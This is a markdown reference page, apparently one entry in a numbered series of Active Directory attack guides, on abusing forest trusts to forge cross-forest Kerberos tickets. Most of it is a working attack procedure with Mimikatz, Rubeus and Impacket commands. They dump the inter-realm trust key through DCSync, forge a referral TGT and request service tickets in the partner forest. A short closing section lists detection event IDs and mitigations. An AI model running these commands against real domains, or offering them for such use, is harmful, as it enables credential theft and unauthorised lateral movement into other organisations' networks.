attack-69-forest-trust-abuse-cross-forest-ticket-forging.md (3918B)
1 --- 2 title: "Attack #69 β Forest Trust Abuse Cross-Forest Ticket Forging" 3 description: "When two forests have a forest trust, users from one forest can access resources in the other (if explicitly permitted). An attacker who compromises theβ¦" 4 category: active-directory 5 subcategory: "Trust Abuse" 6 tags: ["active-directory", "kerberos", "credential-access", "hashing"] 7 tools: ["Impacket", "Mimikatz", "Rubeus", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Nine/πΆ Attack #69 β Forest Trust Abuse Cross-Forest Ticket Forging.md" 11 --- 12 # πΆ Attack #69 β Forest Trust Abuse / Cross-Forest Ticket Forging 13 14 *** 15 16 ## π How It Works 17 18 When two forests have a **forest trust**, users from one forest can access resources in the other (if explicitly permitted). An attacker who compromises the **inter-realm trust key** (the password of the `FOREST2$` trust account) can forge inter-realm TGTs to access the trusted forest. Unlike intra-forest trusts, **SID filtering IS enforced** on forest trusts β so the ExtraSids trick from Attack #68 won't work. Instead, the attacker must target **shared/delegated groups** that have been granted access across the trust. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **KRBTGT hash (your domain)** | Or the inter-realm trust key | 27 | **Trust relationship exists** | Bidirectional or one-way forest trust | 28 | **Shared groups / resources** | Foreign domain groups your SID matches | 29 30 *** 31 32 ## π» Full Commands 33 34 ```powershell 35 # ββ Enumerate trust relationships βββββββββββββββββββββββββββββββββββββββββββββ 36 Get-ADTrust -Filter * | Select Name,Direction,TrustType,ForestTransitive 37 38 # ββ Dump inter-realm trust key ββββββββββββββββββββββββββββββββββββββββββββββββ 39 mimikatz.exe "lsadump::dcsync /domain:corp.local /user:partner$" exit 40 # partner$ = the trust account for partner.com forest trust 41 42 # ββ Forge inter-realm TGT βββββββββββββββββββββββββββββββββββββββββββββββββββββ 43 kerberos::golden /user:Administrator /domain:corp.local \ 44 /sid:S-1-5-21-<corp_SID> /rc4:<trust_key_hash> \ 45 /service:krbtgt /target:partner.com /ptt 46 # This creates a referral ticket to the partner forest 47 48 # ββ Request TGS in the foreign forest βββββββββββββββββββββββββββββββββββββββββ 49 .\Rubeus.exe asktgs /ticket:<inter-realm_TGT> \ 50 /service:cifs/PARTNER-DC.partner.com /dc:PARTNER-DC.partner.com /ptt 51 ``` 52 53 ```bash 54 # ββ Impacket ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 55 ticketer.py -nthash <trust_key_hash> \ 56 -domain-sid S-1-5-21-<corp_SID> \ 57 -domain corp.local \ 58 -spn krbtgt/partner.com \ 59 Administrator 60 61 export KRB5CCNAME=Administrator.ccache 62 # Then access permitted resources in partner.com 63 ``` 64 65 *** 66 67 ## π‘οΈ Detection β Event IDs 68 69 | Event ID | Source | What to Look For | 70 |---|---|---| 71 | **4769** | Security Log (DC) | TGS request from external forest | 72 | **4768** | Security Log (DC) | Inter-realm TGT referral | 73 74 *** 75 76 ## π Attack Chain Context 77 78 ``` 79 [Forest Trust Abuse] βββ Cross-forest lateral movement via trust key 80 β 81 ββββ β οΈ SID filtering BLOCKS ExtraSids on forest trusts 82 ββββ π Must target groups explicitly shared across trust 83 ββββ π Defeated by: selective authentication, minimize trust scope 84 ``` 85 86 *** 87 88 > β **Attack #69 β Forest Trust Abuse complete.**